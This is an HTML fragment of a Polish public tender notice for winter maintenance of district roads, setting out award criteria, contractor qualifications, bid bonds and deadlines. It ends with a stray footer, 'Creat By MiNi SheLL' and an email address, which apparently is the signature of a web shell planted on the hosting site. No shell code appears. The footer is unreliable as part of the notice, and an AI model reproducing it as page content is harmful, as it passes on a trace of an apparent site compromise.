<h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług zamówienia,<br/>polegającego na powtórzeniu podobnych usług, stanowiących nie więcej niż 30% wartości zamówienia podstawowego, zgodnych z przedmiotem niniejszego zamówienia (w szczególności: zwalczanie śliskości i odśnieżanie podstawioną przez usługodawcę pługopiaskarką na samochodzie z napędem co najmniej na dwie osie o ładowności 8-16 t). Zamówienie zostanie udzielone, gdy zaistnieje<br/>uzasadniona potrzeba i możliwość rozszerzenia zamówienia podstawowego oraz zostaną zapewnione środki finansowe na ten cel. Wysokość wynagrodzenia zamówienia polegającego na powtórzeniu podobnych usług zostanie ustalona w drodze negocjacji z Wykonawcą. Zamówienie zostanie udzielone dotychczasowemu Wykonawcy pod warunkiem, że: zapewni nie gorszy<br/>standard wykonywania nowego zamówienia niż podstawowego, przy zawieraniu umowy na zamówienie polegające na powtórzeniu<br/>podobnych usług – zaakceptuje istotne warunki umowy odnoszącej się do zamówienia podstawowego z uwzględnieniem różnic wynikających z wartości, czasu realizacji i innych istotnych okoliczności mających miejsce w chwili udzielania zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona wyboru najkorzystniejszej oferty, stosując następujące kryteria:<br/>• Cena – 60 pkt<br/>• Czas reakcji – 40 pkt<br/>2. Zasady oceny kryterium „Cena” (C)<br/>Kryterium „Cena”(C) - będzie rozpatrywana na podstawie ceny ofertowej brutto za wykonanie przedmiotu zamówienia wpisanej<br/>przez Wykonawcę w formularzu oferty. W tym kryterium można uzyskać maksymalnie 60 punktów (znaczenie w ocenie pkt = %). W<br/>przypadku kryterium „Cena”(C) - oferta otrzyma zaokrągloną do dwóch miejsc po przecinku ilość punktów wynikającą ze wzoru:<br/>C = [ Cmin: Co] x 60 pkt<br/>gdzie:<br/>C – ilość punktów jakie otrzyma badana oferta za kryterium „Cena”<br/>Cmin – cena najniższa spośród wszystkich ważnych i nieodrzuconych ofert<br/>Co – cena badanej oferty<br/>Ceny należy podać z dokładnością do dwóch miejsc po przecinku.<br/>3. Zasady oceny kryterium czasu reakcji<br/>Czas reakcji - wskaźnik R dla części od 1 do 3 - czas rozpoczęcia pracy od zawiadomienia telefonicznego przez Zamawiającego.<br/>R - liczba punktów uzyskanych przez ofertę w kryterium czasu rozpoczęcia pracy lub załadunku mieszanki od zawiadomienia<br/>telefonicznego przez Zamawiającego (max – 40 pkt.)<br/>R:<br/>0 pkt - w przypadku deklarowanego czasu rozpoczęcia pracy lub załadunku mieszanki, liczonego od zawiadomienia telefonicznego<br/>przez Zamawiającego wynoszącego powyżej 2 godzin,<br/>20 pkt - w przypadku deklarowanego czasu rozpoczęcia pracy lub załadunku mieszanki, liczonego od zawiadomienia telefonicznego<br/>przez Zamawiającego wynoszącego powyżej 1 godziny do 2 godzin,<br/>40 pkt - w przypadku deklarowanego czasu rozpoczęcia pracy lub załadunku mieszanki, liczonego od zawiadomienia telefonicznego<br/>przez Zamawiającego wynoszącego do 1 godziny.<br/>4. Za najkorzystniejszą ofertę zostanie uznana ta, która uzyska łącznie największą liczbę punktów (P) wyliczoną zgodnie ze wzorem:<br/>P= C + R<br/>gdzie:<br/>P – łączna liczba punktów oferty ocenianej<br/>C – liczba punktów uzyskanych w kryterium „Cena”<br/>R – liczba punktów uzyskanych w kryterium „Czas reakcji”<br/>Oferta w łącznej ocenie oferty może uzyskać maksymalnie 100 pkt<br/>4.1. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po<br/>przecinku, zgodnie z zasadami arytmetyki.<br/>4.2. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym<br/>zaoferowanej ceny.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają określone przez Zamawiającego warunki udziału w<br/>postępowaniu, dotyczące:<br/>1. Zdolności do występowania w obrocie gospodarczym;<br/>• Zamawiający nie określa.<br/>2. Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>• Zamawiający nie określa.<br/>3. Sytuacji ekonomicznej lub finansowej;<br/>• Zamawiający nie określa.<br/>4. Zdolności technicznej lub zawodowej;<br/>Zdolności technicznej lub zawodowej:<br/>A) Dysponowanie odpowiednim potencjałem technicznym;<br/>wykonawca na okres realizacji zamówienia musi dysponować jednostkami sprzętowymi i środkami transportu, na które<br/>składa swoja ofertę, tj.:<br/>Dla części nr 1 – pługo-piaskarka na samochodzie z napędem co najmniej na dwie osie (w tym oś przednią i oś tylną) o<br/>ładowności 8-16- 2 szt., nośnik z pługiem samochód ładowności 8-16 t- 1 szt.,<br/>Dla części nr 2 – pługo-piaskarka na samochodzie z napędem co najmniej na dwie osie (w tym oś przednią i oś tylną) o<br/>ładowności 8-16- 2 szt., nośnik z pługiem samochód ładowności 8-16 t- 1 szt.,<br/>Dla części nr 3 – pługo-piaskarka na samochodzie z napędem co najmniej na dwie osie (w tym oś przednią i oś tylną) o<br/>ładowności 8-16- 2 szt., nośnik z pługiem samochód ładowności 8-16 t- 1 szt.,<br/>UWAGA:<br/>Wszystkie w/w pojazdy muszą być w dyspozycji Wykonawcy, powinny być zarejestrowane, ubezpieczone, muszą posiadać<br/>aktualne badania techniczne i świadectwa dopuszczenia do ruchu.<br/>Zamawiający przewiduje możliwość wyposażenia floty Wykonawcy w urządzenia GPS (urządzenia stanowią własność<br/>Zamawiającego) umożliwiając tym samym wyrywkową kontrolę jakości świadczonych usług przez Wykonawcę.<br/>W przypadku składania oferty na więcej niż 1 część Wykonawca musi dysponować minimalną ilością pojazdów<br/>wymaganych oddzielnie na każdą część zamówienia.<br/>B) Dysponowanie osobami zdolnymi do wykonania zamówienia;<br/>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że w okresie realizacji zamówienia będzie dysponował min:<br/>osobami, które będą uczestniczyć w wykonywaniu zamówienia posiadającymi wymagane uprawnienia, tj.<br/>Dla części nr 1 – kierowca / operator posiadający prawo jazdy odpowiedniej kategorii, uprawniania do kierowania sprzętem<br/>(3 osoby),<br/>Dla części nr 2 – kierowca / operator posiadający prawo jazdy odpowiedniej kategorii, uprawniania do kierowania sprzętem<br/>(3 osoby),<br/>Dla części nr 3 – kierowca / operator posiadający prawo jazdy odpowiedniej kategorii, uprawniania do kierowania sprzętem<br/>(3 osoby),<br/>W przypadku składania oferty na dwie lub więcej części Wykonawca musi wykazać się sumą warunków dla poszczególnych<br/>części.<br/>W przypadku zmiany wskazanej przez Wykonawcę osoby/osób w wykazie osób (załącznik nr 5 SWZ), zmiana musi być<br/>uzasadniona przez Wykonawcę na piśmie i wymaga zaakceptowania przez Zamawiającego. Zamawiający zaakceptuje taką<br/>zmianę w terminie 7 dni od daty przedłożenia wyłącznie wtedy, gdy kwalifikacje zawodowe i uprawnienia wskazanej osoby<br/>będą spełniać warunki postawione w tym zakresie w SWZ. Zaakceptowana przez Zamawiającego powyższa zmiana musi<br/>być potwierdzona na piśmie.<br/>C) Posiadanie wiedzy i doświadczenia;<br/>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej dwie usługi<br/>porównywalne z przedmiotem zamówienia, polegające na zimowym utrzymaniu dróg publicznych, w tym co najmniej jednej<br/>na drodze o kategorii drogi powiatowej i wyższej tj.<br/>Dla części nr 1 – Zwalczanie śliskości oraz odśnieżanie pługo-piaskarką – minimalna zrealizowana ilość godzin pracy w<br/>ramach jednej umowy: 120 godzin, Odśnieżanie za pomocą nośnika z pługiem jednostronnym lub obustronnym - minimalna<br/>zrealizowana ilość godzin pracy w ramach jednej umowy: 25 godzin,<br/>Dla części nr 2 – Zwalczanie śliskości oraz odśnieżanie pługo-piaskarką – minimalna zrealizowana ilość godzin pracy w<br/>ramach jednej umowy: 120 godzin, Odśnieżanie za pomocą nośnika z pługiem jednostronnym lub obustronnym - minimalna<br/>zrealizowana ilość godzin pracy w ramach jednej umowy: 25 godzin,<br/>Dla części nr 3 – Zwalczanie śliskości oraz odśnieżanie pługo-piaskarką – minimalna zrealizowana ilość godzin pracy w ramach jednej umowy: 120 godzin, Odśnieżanie za pomocą nośnika z pługiem jednostronnym lub obustronnym - minimalna<br/>zrealizowana ilość godzin pracy w ramach jednej umowy: 25 godzin,<br/>• W przypadku składania oferty na dwie lub więcej części Wykonawca musi wykazać się sumą warunków dla<br/>poszczególnych części.<br/>• W przypadku, gdy ww. usługa realizowana była łącznie z innymi usługami Wykonawca musi bezwzględnie określić<br/>wartość brutto tylko tej usługi, która potwierdza spełnienie warunków udziału w niniejszym postępowaniu.<br/>• W związku z art. 118 ust. 2 ustawy Pzp: „W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych<br/>lub doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te<br/>wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga złożenia podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe wymagane od wykonawcy, o których mowa powyżej obejmują:<br/>1. Wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami; (zgodnie z warunkiem określonym w pkt 6.1.4 lit. A) SWZ (wg proponowanego załącznika nr 4 do SWZ).<br/>2. Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami; (zgodnie z warunkiem określonym w pkt 6.1.4 lit. B) SWZ (wg proponowanego załącznika nr 5 do SWZ).<br/>3. Wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich<br/>3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są<br/>wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy; (zgodnie z warunkiem<br/>określonym w pkt 6.1.4 lit. C) SWZ (wg proponowanego załącznika nr 3 do SWZ);<br/>UWAGA:<br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji usług wykonywanych wspólnie z innymi wykonawcami, to wykaz o którym mowa w pkt 8.3.3., dotyczy usług, w których wykonaniu wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy; (Zamawiający zastrzega możliwość zwrócenia się do wykonawcy o wyjaśnienia w zakresie faktycznie i konkretnie wykonywanego zakresu prac oraz przedstawienia stosownych dowodów np. umowy konsorcjum, z której wynika zakres obowiązków czy wystawionych przez wykonawcę faktur).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Ofertę składa się na Formularzu Ofertowym - zgodnie z załącznikiem nr 1 ROZDZIAŁU I do SWZ. Wraz z ofertą Wykonawca<br/>jest zobowiązany złożyć:<br/>• oświadczenia, o których mowa w pkt 8.1 ROZDZIAŁU I SWZ;<br/>• zobowiązanie innego podmiotu, o którym mowa w pkt 9 ROZDZIAŁU I SWZ (jeżeli dotyczy);<br/>• dowód wniesienia wadium (jeśli Zamawiający wymaga wadium);<br/>• dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa (jeżeli dotyczy),<br/>• w przypadku oferty wspólnej, należy do oferty załączyć pełnomocnictwo lub inny dokument ustanawiający pełnomocnika<br/>do reprezentowania wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia albo reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia;<br/>• oświadczenie Wykonawców <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca jest zobowiązany do wniesienia wadium w wysokości:<br/>- na Część nr 1 - w wysokości 1 600,00 zł<br/>- na Część nr 2 - w wysokości 1 600,00 zł<br/>- na Część nr 3 - w wysokości 1 600,00 zł <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty i złożone w oryginale w takiej samej formie, jak składana oferta (tj. w formie elektronicznej podpisanej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym). Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa<br/>sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14.02.1991 r. – Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej<br/>kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w pkt 8.1 ROZDZIAŁU I SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>5. Pełnomocnik pozostaje w stałym kontakcie z Zamawiającym, w toku postępowania zwraca się do Zamawiającego z wszelkimi sprawami i do niego Zamawiający kieruje informacje, korespondencję itp.<br/>6. Przed podpisaniem umowy (w przypadku wyboru oferty wspólnej jako najkorzystniejszej) Wykonawcy składający ofertę wspólną mają obowiązek przedstawić Zamawiającemu umowę konsorcjum / umowę spółki cywilnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Umowa zostanie zawarta w wyznaczonym przez Zamawiającego terminie i miejscu.<br/>2. Zamawiający wymaga, aby Wykonawca zawarł z nim umowę na zasadach określonych we wzorze umowy, określonym w ROZDZIALE II SWZ.<br/>3. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, chyba że wystąpią okoliczności których nie można było wcześniej przewidzieć, a które przemawiają za koniecznością zmiany postanowień umowy określone we wzorze umowy zgodnie ROZDZIAŁEM II SWZ oraz art. 455 ustawy Pzp.<br/>4. Wykonawca zobowiązany jest wykazać zaistnienie okoliczności wskazanych we wzorze umowy poprzez przedłożenie stosownych ekspertyz, opinii, dokumentów, itp. z których będzie wynikać konieczność zmiany umowy.<br/>5. Wszelkie istotne zmiany treści umowy wymagają zgody obydwu stron i formy pisemnej w postaci aneksu pod rygorem nieważności.<br/>6. Wprowadzenie zmian nieistotnych w umowie wymagają formy pisemnej pod rygorem nieważności.<br/>7. Podpisanie aneksu do umowy wprowadzającego zmiany istotne powinno być poprzedzone, pod rygorem nieważności, sporządzeniem protokołu konieczności zawierającego uzasadnienie.<br/>8. Konsekwencją zmiany umowy (aneksowania) może być w szczególności zmiana terminu zakończenia realizacji zadania, wydłużenie terminów obowiązywania zabezpieczenia należytego wykonania umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/zdp_lezajsk</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-08 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-09-06</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com